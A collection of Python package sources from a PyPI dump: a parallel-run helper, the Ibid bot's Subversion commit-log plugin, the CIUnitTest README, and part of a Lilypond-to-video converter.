Number of futures to submit to a single process pool for
parallel futures.
timeout : int | float
Number of seconds to wait for parallel run iteration to complete
before returning zeros.
kwargs : dict
Keyword arguments to self._run_single_worker().
"""
max_workers = os.cpu_count() if max_workers is None else max_workers
logger.info('Running parallel execution with max_workers={}'
.format(max_workers))
i = 0
N, pc_chunks = self._pre_split_pc(pool_size=pool_size)
for j, pc_chunk in enumerate(pc_chunks):
logger.debug('Starting process pool for points control '
'iteration {} out of {}'
.format(j + 1, len(pc_chunks)))
failed_futures = False
chunks = {}
futures = []
loggers = [__name__, 'reV.gen', 'reV.econ', 'reV']
with SpawnProcessPool(max_workers=max_workers,
loggers=loggers) as exe:
for pc in pc_chunk:
future = exe.submit(self._run_single_worker, pc, **kwargs)
futures.append(future)
chunks[future] = pc
for future in futures:
i += 1
try:
result = future.result(timeout=timeout)
except TimeoutError:
failed_futures = True
sites = chunks[future].project_points.sites
result = self._handle_failed_future(future, i, sites,
timeout)
self.out = result
mem = psutil.virtual_memory()
m = ('Parallel run at iteration {0} out of {1}. '
'Memory utilization is {2:.3f} GB out of {3:.3f} GB '
'total ({4:.1f}% used, intended limit of {5:.1f}%)'
.format(i, N, mem.used / 1e9, mem.total / 1e9,
100 * mem.used / mem.total,
100 * self.mem_util_lim))
logger.info(m)
if failed_futures:
logger.info('Forcing pool shutdown after failed futures.')
exe.shutdown(wait=False)
logger.info('Forced pool shutdown complete.')
self.flush()
def _handle_failed_future(self, future, i, sites, timeout):
"""Handle a failed future and return zeros.
Parameters
----------
future : concurrent.futures.Future
Failed future to cancel.
i : int
Iteration number for logging
sites : list
List of site gids belonging to this failed future.
timeout : int
Number of seconds to wait for parallel run iteration to complete
before returning zeros.
"""
w = ('Iteration {} hit the timeout limit of {} seconds! Passing zeros.'
.format(i, timeout))
logger.warning(w)
warn(w, OutputWarning)
site_out = {k: 0 for k in self.output_request}
result = {site: site_out for site in sites}
try:
cancelled = future.cancel()
except Exception as e:
w = 'Could not cancel future! Received exception: {}'.format(e)
logger.warning(w)
warn(w, ParallelExecutionWarning)
if not cancelled:
w = 'Could not cancel future!'
logger.warning(w)
warn(w, ParallelExecutionWarning)
return result | PypiClean |
/Ibid-0.1.1.tar.gz/Ibid-0.1.1/ibid/plugins/svn.py | from datetime import datetime, timedelta
import logging
import os.path
from os import kill
from signal import SIGTERM
import textwrap
import ibid
from ibid.compat import ElementTree as ET, dt_strptime
from subprocess import Popen, PIPE
from time import time, sleep, mktime
# Can use either pysvn or command-line svn
try:
import pysvn
except:
pysvn = None
from ibid.plugins import Processor, match, RPC, authorise
from ibid.config import DictOption, FloatOption, Option, BoolOption
from ibid.utils import ago, format_date, human_join
features = {'svn': {
'description': u'Retrieves commit logs from a Subversion repository.',
'categories': ('development', 'lookup',),
}}
HEAD_REVISION = object()
class Branch(object):
def __init__(self, repository_name = None, url = None, username = None, password = None, multiline = False):
self.repository = repository_name
self.url = url
self.username = username
self.password = password
self.multiline = multiline
def get_commits(self, start_revision = None, end_revision = None, limit = None, full = False):
"""
Get formatted commit messages for each of the commits in range
[start_revision:end_revision], defaulting to the latest revision.
"""
if not full: # such as None
full = False
if not start_revision:
start_revision = HEAD_REVISION
start_revision = self._convert_to_revision(start_revision)
# If no end-revision and no limit given, set limit to 1
if not end_revision:
end_revision = 0
if not limit:
limit = 1
end_revision = self._convert_to_revision(end_revision)
log_messages = self.log(start_revision, end_revision, limit=limit, paths=full)
commits = [self.format_log_message(log_message, full) for log_message in log_messages]
return commits
def _generate_delta(self, changed_paths):
class T(object):
pass
delta = T()
delta.basepath = "/"
delta.added = []
delta.modified = []
delta.removed = []
delta.renamed = []
action_mapper = {
'M': delta.modified,
'A': delta.added,
'D': delta.removed,
}
all_paths = [changed_path.path for changed_path in changed_paths]
commonprefix = os.path.commonprefix(all_paths)
# os.path.commonprefix will return "/e" if you give it "/etc/passwd"
# and "/exports/foo", which is not what we want. Remove until the last
# "/" character.
while commonprefix and commonprefix[-1] != "/":
commonprefix = commonprefix[:-1]
pathinfo = commonprefix
if commonprefix.startswith("/trunk/"):
commonprefix = "/trunk/"
pathinfo = " [trunk]"
if commonprefix.startswith("/branches/"):
commonprefix = "/branches/%s" % (commonprefix.split('/')[2],)
pathinfo = " [" + commonprefix.split('/')[2] + "]"
if commonprefix.startswith("/tags/"):
commonprefix = "/tags/%s" % (commonprefix.split('/')[2],)
pathinfo = " [" + commonprefix.split('/')[2] + "]"
for changed_path in changed_paths:
action_mapper[changed_path.action].append([changed_path.path[len(commonprefix):], None])
return pathinfo, delta
def format_log_message(self, log_message, full=False):
"""
author - string - the name of the author who committed the revision
date - float time - the date of the commit
message - string - the text of the log message for the commit
revision - pysvn.Revision - the revision of the commit
changed_paths - list of dictionaries. Each dictionary contains:
path - string - the path in the repository
action - string
copyfrom_path - string - if copied, the original path, else None
copyfrom_revision - pysvn.Revision - if copied, the revision of the original, else None
"""
revision_number = log_message['revision'].number
author = log_message['author']
commit_message = log_message['message']
timestamp = log_message['date']
if full:
pathinfo, delta = self._generate_delta(log_message['changed_paths'])
changes = []
if delta.added:
if self.multiline:
changes.append('Added:\n\t%s' % '\n\t'.join([file[0] for file in delta.added]))
else:
changes.append('Added: %s' % ', '.join([file[0] for file in delta.added]))
if delta.modified:
if self.multiline:
changes.append('Modified:\n\t%s' % '\n\t'.join([file[0] for file in delta.modified]))
else:
changes.append('Modified: %s' % '\, '.join([file[0] for file in delta.modified]))
if delta.removed:
if self.multiline:
changes.append('Removed:\n\t%s' % '\n\t'.join([file[0] for file in delta.removed]))
else:
changes.append('Removed: %s' % ', '.join([file[0] for file in delta.removed]))
if delta.renamed:
changes.append('Renamed: %s' % ', '.join(['%s => %s' % (file[0], file[1]) for file in delta.renamed]))
timestamp_dt = datetime.utcfromtimestamp(timestamp)
if self.multiline:
commit = 'Commit %s by %s to %s%s on %s at %s:\n\n\t%s \n\n%s\n' % (
revision_number,
author,
self.repository,
pathinfo,
format_date(timestamp_dt, 'date'),
format_date(timestamp_dt, 'time'),
u'\n'.join(textwrap.wrap(commit_message, initial_indent=" ", subsequent_indent=" ")),
'\n\n'.join(changes))
else:
commit = 'Commit %s by %s to %s%s on %s at %s: %s (%s)\n' % (
revision_number,
author,
self.repository,
pathinfo,
format_date(timestamp_dt, 'date'),
format_date(timestamp_dt, 'time'),
commit_message.replace('\n', ' '),
'; '.join(changes))
else:
commit = 'Commit %s by %s to %s %s ago: %s\n' % (
revision_number,
author,
self.repository,
ago(datetime.now() - datetime.fromtimestamp(timestamp), 2),
commit_message.replace('\n', ' '))
return commit
class PySVNBranch(Branch):
def _call_command(self, command, *args, **kw):
return command(self, username=self.username, password=self.password)(*args, **kw)
def log(self, *args, **kw):
"""
Low-level SVN logging call - returns lists of pysvn.PysvnLog objects.
"""
return self._call_command(SVNLog, *args, **kw)
def _convert_to_revision(self, revision):
"""
Convert numbers to pysvn.Revision instances
"""
if revision is HEAD_REVISION:
return pysvn.Revision(pysvn.opt_revision_kind.head)
try:
revision.kind
return revision
except:
return pysvn.Revision(pysvn.opt_revision_kind.number, revision)
class CommandLineChangedPath(object):
pass
class TimeoutException(Exception):
pass
class CommandLineRevision(object):
def __init__(self, number):
self.number = number
class CommandLineBranch(Branch):
def __init__(self, repository_name = None, url = None, username = None, password = None, svn_command = 'svn', svn_timeout = 15.0, multiline = False):
super(CommandLineBranch, self).__init__(repository_name, url, username, password, multiline=multiline)
self.svn_command = svn_command
self.svn_timeout = svn_timeout
def _convert_to_revision(self, revision):
return revision
def log(self, start_revision, end_revision, paths=False, limit=1):
cmd = ["svn", "log", "--no-auth-cache", "--non-interactive", "--xml"]
if paths:
cmd.append("-v")
if self.username:
cmd.append("--username")
cmd.append(self.username)
if self.password:
cmd.append("--password")
cmd.append(self.password)
if limit:
cmd.append("--limit")
cmd.append(str(limit))
if start_revision is None or start_revision is HEAD_REVISION:
pass
else:
if not end_revision or start_revision == end_revision:
if not limit:
# if start revision, no end revision (or equal to start_revision), and no limit given, just the revision
cmd.append("-r")
cmd.append(str(start_revision))
cmd.append("--limit")
cmd.append("1")
else:
cmd.append("-r")
cmd.append("%i" % (start_revision,))
else:
cmd.append("-r")
cmd.append("%i:%i" % (end_revision, start_revision))
cmd.append(self.url)
logging.getLogger('plugins.svn').info(str(cmd))
svnlog = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE)
svnlog.stdin.close()
start_time = time()
while svnlog.poll() is None and time() - start_time < self.svn_timeout:
sleep(0.1)
if svnlog.poll() is None:
kill(svnlog.pid, SIGTERM)
raise TimeoutException()
output = svnlog.stdout.read()
return self._xml_to_log_message(output)
def _xmldate_to_timestamp(self, xmldate):
xmldate = xmldate.split('.')[0]
dt = dt_strptime(xmldate, "%Y-%m-%dT%H:%M:%S")
return mktime(dt.timetuple())
def _xml_to_log_message(self, output):
"""
author - string - the name of the author who committed the revision
date - float time - the date of the commit
message - string - the text of the log message for the commit
revision - pysvn.Revision - the revision of the commit
changed_paths - list of dictionaries. Each dictionary contains:
path - string - the path in the repository
action - string
copyfrom_path - string - if copied, the original path, else None
copyfrom_revision - pysvn.Revision - if copied, the revision of the original, else None
"""
doc = ET.fromstring(output)
entries = []
for logentry in doc:
entry = dict(
revision = CommandLineRevision(logentry.get('revision')),
author = logentry.findtext("author"),
date = self._xmldate_to_timestamp(logentry.findtext("date")),
message = logentry.findtext("msg"),
)
entry['changed_paths'] = []
paths = logentry.find("paths")
if paths:
for path in paths:
cp = CommandLineChangedPath()
cp.kind = path.get('kind')
cp.action = path.get('action')
cp.path = path.text
entry['changed_paths'].append(cp)
entries.append(entry)
return entries
class SVNCommand(object):
def __init__(self, branch, username=None, password=None):
self._branch = branch
self._username = username
self._password = password
self._client = self._initClient(branch)
def _initClient(self, branch):
client = pysvn.Client()
client.callback_get_login = self.get_login
client.callback_cancel = CancelAfterTimeout()
return client
def get_login(self, realm, username, may_save):
if self._username and self._password:
return True, self._username.encode('utf-8'), self._password.encode('utf-8'), False
return False, None, None, False
def _initCommand(self):
self._client.callback_cancel.start()
pass
def _destroyCommand(self):
self._client.callback_cancel.done()
pass
def __call__(self, *args, **kw):
self._initCommand()
return self._command(*args, **kw)
self._destroyCommand()
class SVNLog(SVNCommand):
def _command(self, start_revision=HEAD_REVISION, end_revision=None, paths=False, stop_on_copy=True, limit=1):
log_messages = self._client.log(self._branch.url, revision_start=start_revision, revision_end=end_revision, discover_changed_paths=paths, strict_node_history=stop_on_copy, limit=limit)
return log_messages
class CancelAfterTimeout(object):
"""
Implement timeout for if a SVN command is taking its time
"""
def __init__(self, timeout = 15):
self.timeout = timeout
def start(self):
self.cancel_at = datetime.now() + timedelta(seconds=self.timeout)
def __call__(self):
return datetime.now() > self.cancel_at
def done(self):
pass
class Subversion(Processor, RPC):
usage = u"""(last commit|commit <revno>) [to <repo>] [full]
(svnrepos|svnrepositories)
"""
feature = ('svn',)
autoload = False
permission = u'svn'
repositories = DictOption('repositories', 'Dict of repositories names and URLs')
svn_command = Option('svn_command', 'Path to svn executable', 'svn')
svn_timeout = FloatOption('svn_timeout', 'Maximum svn execution time (sec)', 15.0)
multiline = BoolOption('multiline', 'Output multi-line (Jabber, Campfire)', False)
def __init__(self, name):
self.log = logging.getLogger('plugins.svn')
Processor.__init__(self, name)
RPC.__init__(self)
def setup(self):
self.branches = {}
for name, repository in self.repositories.items():
reponame = name.lower()
if pysvn:
self.branches[reponame] = PySVNBranch(reponame, repository['url'], username = repository['username'], password = repository['password'], multiline=self.multiline)
else:
self.branches[reponame] = CommandLineBranch(reponame, repository['url'], username = repository['username'], password = repository['password'], svn_command=self.svn_command, svn_timeout=self.svn_timeout, multiline=self.multiline)
@match(r'^svn ?(?:repos|repositories)$')
@authorise()
def handle_repositories(self, event):
repositories = self.branches.keys()
if repositories:
event.addresponse(u'I know about: %s', human_join(sorted(repositories)))
else:
event.addresponse(u"I don't know about any repositories")
def remote_committed(self, repository, start, end=None):
commits = self.get_commits(repository, start, end)
repo = self.repositories[repository]
for commit in commits:
ibid.dispatcher.send({'reply': commit.strip(),
'source': repo['source'],
'target': repo['channel'],
})
return True
@match(r'^(?:last\s+)?commit(?:\s+(\d+))?(?:(?:\s+to)?\s+(\S+?))?(\s+full)?$')
@authorise()
def commit(self, event, revno, repository, full):
if repository == "full":
repository = None
full = True
if full:
full = True
revno = revno and int(revno) or None
commits = self.get_commits(repository, revno, full=full)
if commits:
for commit in commits:
if commit:
event.addresponse(commit.strip())
def get_commits(self, repository, start, end=None, full=None):
branch = None
if repository:
repository = repository.lower()
if repository not in self.branches:
return None
branch = self.branches[repository]
if not branch:
(repository, branch) = self.branches.items()[0]
if not start:
start = HEAD_REVISION
if not end:
end = None
commits = branch.get_commits(start, end_revision=end, full=full)
return commits
# vi: set et sta sw=4 ts=4: | PypiClean |
/CIUnitTest-1.0.9-py3-none-any.whl/CIUnitTest-1.0.9.dist-info/DESCRIPTION.rst | CI Unit Test
============
CI Unit Test is a library which enables to retrieve the results of unit tests in JSON format. This may be used in custom Continuous Integration systems which need to process the results of unit tests.
The results can be saved as is to a NoSQL database, or can be returned as a Python object in order to be combined with other information before being saved.
Usage
-----
The results in JSON format can be obtained by using `JsonTestRunner`:
.. code:: python
suite = unittest.TestLoader().loadTestsFromTestCase(TestsDemo)
json = ciunittest.JsonTestRunner().run(suite, formatted=True)
print(json)
Since the first line uses unittest, all unittest features are available, such as the auto-discovery of unit tests in a project directory:
.. code:: python
suite = unittest.TestLoader().discover(targetPath)
To obtain the results as a Python object, use `ObjectTestRunner`:
.. code:: python
suite = unittest.TestLoader().loadTestsFromTestCase(TestsDemo)
result = ciunittest.ObjectTestRunner().run(suite)
print('Done %d tests in %d ms.' %
(len(result['results']), result['spentMilliseconds']))
To perform an action at the beginning of every test (independently of the runner being used,) do:
.. code:: python
suite = unittest.TestLoader().loadTestsFromTestCase(TestsDemo)
runner = ciunittest.JsonTestRunner()
runner.on_start = lambda test: print(".", end="", flush=True)
result = runner.run(suite)
...
In the previous code sample, every time the runner is ready to start a new test, a dot is displayed in the terminal.
Similarly, one can execute arbitrary code at the end of every test. The test result, that is `ciunittest.Success`, `ciunittest.Error` or `ciunittest.Failure`, will be passed as a second parameter to the function.
.. code:: python
runner.on_end = lambda test, result: print(result, flush=True)
The code is inspired by http://pythonhosted.org/gchecky/unittest-pysrc.html
If you have any question or remark, please contact me at arseni.mourzenko@pelicandd.com. Critics are also welcome, since I have used Python for only a few days, and probably get lots of things wrong.
| PypiClean |
/LilypondToBandVideoConverter-1.1.1.tar.gz/LilypondToBandVideoConverter-1.1.1/lilypondtobvc/src/convertermodules/ltbvc.py |
#====================
# IMPORTS
#====================
import argparse
import re
from basemodules.datatypesupport import SETATTR
from basemodules.operatingsystem import OperatingSystem
from basemodules.simplelogging import Logging
from basemodules.simpletypes import Boolean, Callable, List, Map, \
Natural, String, StringList, \
StringMap, StringSet, Tuple
from basemodules.stringutil import deserializeToList
from basemodules.ttbase import iif
from basemodules.validitychecker import ValidityChecker
from .audiotrackmanager import AudioTrackManager
from .lilypondfilegenerator import LilypondFile
from .lilypondpngvideogenerator import LilypondPngVideoGenerator
from .ltbvc_businesstypes import TrackSettings
from .ltbvc_configurationdatahandler import LTBVC_ConfigurationData
from .miditransformer import MidiTransformer
from .videoaudiocombiner import VideoAudioCombiner
#====================
# TYPE DEFINITIONS
#====================
subtitleFileNameTemplate = "%s_subtitle.srt"
silentVideoFileNameTemplate = "%s_noaudio%s.mp4"
# file name used for disabling logging
lowerCasedNullLoggingFileName = "none"
#--------------------
#--------------------
def intersection (listA : List, listB : List) -> List:
"""Returns the intersection of lists <listA> and <listB>."""
result = (element for element in listA if element in listB)
return result
#--------------------
def makeMap (listA : List, listB : List) -> Map:
"""Returns a map from the elements in <listA> to <listB> assuming
that list lengths are equal"""
result = {}
for i, key in enumerate(listA):
value = listB[i]
result[key] = value
return result
#====================
class _CommandLineOptions:
"""This module handles command line options and checks them."""
#--------------------
@classmethod
def checkArguments (cls,
argumentList : StringList):
"""Checks whether command line options given in <argumentList>
are okay"""
Logging.trace(">>")
configurationFilePath = argumentList.configurationFilePath
loggingFilePath = argumentList.loggingFilePath
givenPhaseSet = set(deserializeToList(argumentList.phases, "/"))
ValidityChecker.isReadableFile(configurationFilePath,
"configurationFilePath")
if loggingFilePath is not None:
if loggingFilePath.lower() != lowerCasedNullLoggingFileName:
ValidityChecker.isWritableFile(loggingFilePath,
"loggingFilePath")
allowedPhaseSet = set(["all", "preprocess", "postprocess",
"extract", "score", "midi", "silentvideo",
"rawaudio", "refinedaudio", "mix",
"finalvideo"])
Logging.trace("--: given phase set %r, allowed phase set %r",
givenPhaseSet, allowedPhaseSet)
ValidityChecker.isValid(givenPhaseSet.issubset(allowedPhaseSet),
"bad phases - %s"
% str(list(givenPhaseSet))[1:-1])
Logging.trace("<<")
#--------------------
@classmethod
def read (cls):
"""Reads commandline options and sets variables appropriately;
returns tuple of variables read"""
Logging.trace(">>")
programDescription = ("Generates lilypond files and target files"
+ " for single voices, a complete score,"
+ " a midi file and videos based on a"
+ " configuration file")
p = argparse.ArgumentParser(description=programDescription)
p.add_argument("-k", action="store_true", dest="keepFiles",
help="tells to keep intermediate files")
p.add_argument("configurationFilePath",
help="name of configuration file for song")
p.add_argument("-l", "--loggingFilePath")
p.add_argument("--phases",
required=True,
help=("slash-separated list of phase names to be"
+ " executed; (for preprocessing) tells whether"
+ " a voice extract, a full score"
+ " a video or a midi should be produced;"
+ " (for postprocessing) tells whether the"
+ " single audio tracks, the audio mixdown"
+ " or the final video shall be produced"))
p.add_argument("--voices",
default="",
help=("slash-separated list of voice names to be"
+ " processed (optional, default is all voices)"))
argumentList = p.parse_args()
if argumentList.voices == "":
selectedVoiceNameSet = set()
else:
selectedVoiceNameSet = \
set(deserializeToList(argumentList.voices,"/"))
processingPhaseSet = set(deserializeToList(argumentList.phases, "/"))
intermediateFilesAreKept = argumentList.keepFiles
result = (intermediateFilesAreKept, processingPhaseSet,
selectedVoiceNameSet, argumentList)
Logging.trace("<<: intermediateFilesAreKept = %r,"
+ " processingPhaseSet = %r,"
+ " selectedVoiceNameSet = %r,"
+ " arguments = %r",
intermediateFilesAreKept, processingPhaseSet,
selectedVoiceNameSet, argumentList)
return result
#====================
class _LilypondProcessor:
"""Handles generation of extracts, score, midi file and silent
video."""
_configData = None
_selectedVoiceNameSet = set()
_lilypondCommand = None
_midiFileNameTemplate = "%s-std.mid"
_pathSeparator = OperatingSystem.pathSeparator
#--------------------
# LOCAL FEATURES
#--------------------
@classmethod
def _adaptTempFileName (cls,
processingPhase : String,
voiceNameList : StringList):
"""Constructs a temporary lilypond file name from configuration data
and settings <processingPhase> and <voiceNameList>"""
Logging.trace(">>: phase = %r, voices = %r",
processingPhase, voiceNameList)
template = cls._configData.tempLilypondFilePath
if processingPhase == "extract":
# assume there is only one voice in voice list
voiceName = voiceNameList[0]
template = template.replace("${voiceName}", voiceName)
else:
# strip off the voice name placeholder and any separator
# characters
regexp = re.compile(r"[\(\[_\- ]*\$\{voiceName\}[\)\]_\- ]*")
template = regexp.sub("", template)
result = template.replace("${phase}", processingPhase)
Logging.trace("<<: %r", result)
return result
#--------------------
@classmethod
def _calculateMidiMapsFromConfiguration (cls) -> Tuple:
"""Collects data from configuration file and returns mappings from
voice name to midi instrument, midi volume and midi pan
position"""
Logging.trace(">>")
voiceNameToVoiceDataMap = cls._configData.voiceNameToVoiceDataMap
voiceNameToMidiInstrumentMap = {}
voiceNameToMidiVolumeMap = {}
voiceNameToMidiPanMap = {}
for _, voiceName in enumerate(cls._configData.voiceNameList):
voiceDescriptor = voiceNameToVoiceDataMap[voiceName]
Logging.trace("--: %r", voiceDescriptor)
midiInstrument = voiceDescriptor.midiInstrument
midiVolume = voiceDescriptor.midiVolume
panPosition = voiceDescriptor.panPosition
midiInstrumentBank, midiInstrument = \
cls._stringToMidiInstrument(midiInstrument)
panPosition = cls._stringToMidiPanPosition(panPosition)
voiceNameToMidiInstrumentMap[voiceName] = midiInstrument
voiceNameToMidiVolumeMap[voiceName] = midiVolume
voiceNameToMidiPanMap[voiceName] = panPosition
result = (voiceNameToMidiInstrumentMap,
voiceNameToMidiVolumeMap,
voiceNameToMidiPanMap)
Logging.trace("<<: %r", result)
return result
#--------------------
@classmethod
def _calculateTrackToSettingsMap (cls) -> StringMap:
"""Collects data from configuration file for all the settings
of each track and returns map from track name to midi
channel, volume, pan position and reverb level"""
Logging.trace(">>")
result = {}
voiceNameToVoiceDataMap = cls._configData.voiceNameToVoiceDataMap
for _, voiceName in enumerate(cls._configData.voiceNameList):
voiceDescriptor = voiceNameToVoiceDataMap[voiceName]
Logging.trace("--: %r", voiceDescriptor)
midiChannel = voiceDescriptor.midiChannel
midiInstrument = voiceDescriptor.midiInstrument
midiVolume = voiceDescriptor.midiVolume
panPosition = voiceDescriptor.panPosition
reverbLevel = voiceDescriptor.reverbLevel
panPosition = cls._stringToMidiPanPosition(panPosition)
midiInstrumentBank, midiInstrument = \
cls._stringToMidiInstrument(midiInstrument)
reverbLevel = int(127 * reverbLevel)
trackSettingsEntry = \
TrackSettings(voiceName, midiChannel, midiInstrumentBank,
midiInstrument, midiVolume, panPosition,
reverbLevel)
result[voiceName] = trackSettingsEntry
Logging.trace("<<: %r", result)
return result
#--------------------
@classmethod
def _findOverriddenVoiceSets (cls,
voiceNameSet : StringSet) -> StringSet:
"""Calculates set of overridden voices and remaining set
of selected voices"""
overriddenVoiceNameSet = \
set(cls._configData.voiceNameToOverrideFileNameMap.keys())
Logging.trace(">>: overriddenVoiceSet = %r, voiceSet = %r",
overriddenVoiceNameSet, voiceNameSet)
overriddenVoiceNameSet = (set(voiceNameSet)
& set(overriddenVoiceNameSet))
voiceNameSet = (voiceNameSet - set(overriddenVoiceNameSet))
result = (overriddenVoiceNameSet, voiceNameSet)
Logging.trace("<<: result = %r", result)
return result
#--------------------
@classmethod
def _makePdf (cls,
processingPhase : String,
targetFileNamePrefix : String,
voiceNameList : StringList):
"""Processes lilypond file and generates extract or score PDF
file."""
Logging.trace(">>: targetFilePrefix = %r, voiceNameList=%r",
targetFileNamePrefix, voiceNameList)
tempLilypondFilePath = cls._adaptTempFileName(processingPhase,
voiceNameList)
configData = cls._configData
lilypondFile = LilypondFile(tempLilypondFilePath)
lilypondFile.generate(configData.includeFilePath,
configData.lilypondVersion,
processingPhase, voiceNameList,
configData.title,
configData.songComposerText,
configData.voiceNameToChordsMap,
configData.voiceNameToLyricsMap,
configData.voiceNameToScoreNameMap,
configData.measureToTempoMap,
configData.phaseAndVoiceNameToClefMap,
configData.phaseAndVoiceNameToStaffListMap)
cls._processLilypond(tempLilypondFilePath, targetFileNamePrefix)
OperatingSystem.moveFile(targetFileNamePrefix + ".pdf",
configData.targetDirectoryPath)
OperatingSystem.removeFile(tempLilypondFilePath,
configData.intermediateFilesAreKept)
Logging.trace("<<")
#--------------------
@classmethod
def _processLilypond (cls,
lilypondFilePath : String,
targetFileNamePrefix : String):
"""Processes <lilypondFilePath> and stores result in file with
<targetFileNamePrefix>."""
Logging.trace(">>: lilyFile = %r, targetFileNamePrefix=%r",
lilypondFilePath, targetFileNamePrefix)
OperatingSystem.showMessageOnConsole("== processing "
+ targetFileNamePrefix)
command = (cls._lilypondCommand,
"--output", targetFileNamePrefix,
lilypondFilePath)
OperatingSystem.executeCommand(command, True)
Logging.trace("<<")
#--------------------
@classmethod
def _stringToMidiInstrument(cls,
st : String) -> Tuple:
"""Converts <st> to midi instrument bank plus instrument based on
separator ':' (if any)"""
Logging.trace(">>: %r", st)
if ':' not in st:
midiInstrumentBank, midiInstrument = 0, int(st)
else:
midiInstrumentBank, midiInstrument = st.split(":")
midiInstrumentBank = int(midiInstrumentBank)
midiInstrument = int(midiInstrument)
result = midiInstrumentBank, midiInstrument
Logging.trace("<<: %r", result)
return result
#--------------------
@classmethod
def _stringToMidiPanPosition (cls,
st : String) -> Natural:
"""Returns pan position in range [0, 127] for given <st>"""
Logging.trace(">>: %r", st)
if st == "C":
result = 64
else:
suffix = st[-1]
offset = int(float(st[0:-1]) * 63)
Logging.trace("--: panPosition = %r, pan = %d, suffix = %r",
st, offset, suffix)
result = iif(suffix == "L", 63 - offset, 65 + offset)
Logging.trace("<<: %r", result)
return result
#--------------------
# EXPORTED FEATURES
#--------------------
@classmethod
def processExtract (cls):
"""Generates voice extracts as PDF and move them to local
target directory."""
Logging.trace(">>")
relevantVoiceNameSet = (cls._selectedVoiceNameSet
& cls._configData.extractVoiceNameSet)
for voiceName in relevantVoiceNameSet:
Logging.trace("--: processing %s", voiceName)
singleVoiceNameList = [ voiceName ]
targetFileNamePrefix = ("%s-%s"
% (cls._configData.fileNamePrefix,
voiceName))
cls._makePdf("extract", targetFileNamePrefix, singleVoiceNameList)
Logging.trace("<<")
#--------------------
@classmethod
def processFinalVideo (cls):
"""Generates final videos from silent video, audio tracks and
subtitle files."""
Logging.trace(">>")
configData = cls._configData
intermediateFileDirectoryPath = \
configData.intermediateFileDirectoryPath
tempSubtitleFilePath = (intermediateFileDirectoryPath
+ "/tempSubtitle.srt")
tempMp4FilePath = (intermediateFileDirectoryPath
+ "/tempVideoWithSubtitles.mp4")
# --- shift subtitles ---
subtitleFilePath = "%s/%s" % (configData.targetDirectoryPath,
(subtitleFileNameTemplate
% configData.fileNamePrefix))
VideoAudioCombiner.shiftSubtitleFile(subtitleFilePath,
tempSubtitleFilePath,
configData.shiftOffset)
for _, videoFileKind in configData.videoFileKindMap.items():
silentMp4FilePath = (("%s/" + silentVideoFileNameTemplate)
% (configData.targetDirectoryPath,
configData.fileNamePrefix,
videoFileKind.fileNameSuffix))
videoTargetName = videoFileKind.target
if videoTargetName not in configData.videoTargetMap:
Logging.trace("--: unknown video target %s for file kind %s",
videoTargetName, videoFileKind.name)
else:
videoTarget = configData.videoTargetMap[videoTargetName]
if not videoTarget.subtitlesAreHardcoded:
videoFilePath = silentMp4FilePath
effectiveSubtitleFilePath = tempSubtitleFilePath
else:
videoFilePath = tempMp4FilePath
effectiveSubtitleFilePath = ""
VideoAudioCombiner.insertHardSubtitles( \
silentMp4FilePath,
tempSubtitleFilePath,
videoFilePath,
configData.shiftOffset,
videoTarget.subtitleColor,
videoTarget.subtitleFontSize,
videoTarget.ffmpegPresetName)
targetDirectoryPath = videoFileKind.directoryPath
ValidityChecker.isDirectory(targetDirectoryPath,
"video target directory")
targetVideoFilePath = ("%s/%s%s-%s.mp4"
% (targetDirectoryPath,
configData.targetFileNamePrefix,
configData.fileNamePrefix,
videoTarget.name))
trackDataList = \
AudioTrackManager.constructSettingsForAudioTracks(configData)
VideoAudioCombiner.combine(videoFileKind.voiceNameList,
trackDataList, videoFilePath,
targetVideoFilePath,
effectiveSubtitleFilePath)
mediaType = "TV Show"
VideoAudioCombiner.tagVideoFile(targetVideoFilePath,
configData.albumName,
configData.artistName,
configData.albumArtFilePath,
configData.title,
mediaType,
configData.songYear)
intermediateFilesAreKept = configData.intermediateFilesAreKept
OperatingSystem.removeFile(tempSubtitleFilePath,
intermediateFilesAreKept)
OperatingSystem.removeFile(tempMp4FilePath,
intermediateFilesAreKept)
Logging.trace("<<")
#--------------------
@classmethod
def processMidi (cls):
"""Generates midi file from lilypond file."""
Logging.trace(">>")
configData = cls._configData
intermediateFilesAreKept = configData.intermediateFilesAreKept
tempLilypondFilePath = cls._adaptTempFileName("midi", [])
lilypondFile = LilypondFile(tempLilypondFilePath)
voiceNameToMidiInstrumentMap, \
voiceNameToMidiVolumeMap, \
voiceNameToMidiPanMap = cls._calculateMidiMapsFromConfiguration()
lilypondFile.setMidiParameters(voiceNameToMidiInstrumentMap,
voiceNameToMidiVolumeMap,
voiceNameToMidiPanMap)
lilypondFile.generate(configData.includeFilePath,
configData.lilypondVersion, "midi",
configData.midiVoiceNameList,
configData.title,
configData.songComposerText,
configData.voiceNameToChordsMap,
configData.voiceNameToLyricsMap,
configData.voiceNameToScoreNameMap,
configData.measureToTempoMap,
configData.phaseAndVoiceNameToClefMap,
configData.phaseAndVoiceNameToStaffListMap)
tempMidiFileNamePrefix = (configData.intermediateFileDirectoryPath
+ cls._pathSeparator
+ configData.fileNamePrefix + "-temp")
tempMidiFileName = tempMidiFileNamePrefix + ".mid"
targetMidiFileName = (cls._midiFileNameTemplate
% configData.fileNamePrefix)
cls._processLilypond(tempLilypondFilePath, tempMidiFileNamePrefix)
# postprocess MIDI file
OperatingSystem.showMessageOnConsole("== adapting MIDI into "
+ targetMidiFileName)
trackToSettingsMap = cls._calculateTrackToSettingsMap()
midiTransformer = MidiTransformer(tempMidiFileName,
intermediateFilesAreKept)
midiTransformer.addMissingTrackNames()
midiTransformer.humanizeTracks(configData.countInMeasureCount,
configData.measureToHumanizationStyleNameMap)
midiTransformer.positionInstruments(trackToSettingsMap)
midiTransformer.addProcessingDateToTracks(trackToSettingsMap.keys())
midiTransformer.save(targetMidiFileName)
OperatingSystem.moveFile(targetMidiFileName,
configData.targetDirectoryPath)
OperatingSystem.removeFile(tempMidiFileName,
intermediateFilesAreKept)
OperatingSystem.removeFile(tempLilypondFilePath,
intermediateFilesAreKept)
Logging.trace("<<")
#--------------------
@classmethod
def processMix (cls):
"""Mixdown audio tracks."""
Logging.trace(">>")
audioTrackManager = \
AudioTrackManager(cls._configData.tempAudioDirectoryPath)
audioTrackManager.mixdown(cls._configData)
Logging.trace("<<")
#--------------------
@classmethod
def processRawAudio (cls):
"""Generates unprocessed audio files from generated midi file."""
Logging.trace(">>")
configData = cls._configData
midiFilePath = (configData.targetDirectoryPath + "/"
+ (cls._midiFileNameTemplate
% configData.fileNamePrefix))
relevantVoiceNameSet = (cls._selectedVoiceNameSet
& configData.audioVoiceNameSet)
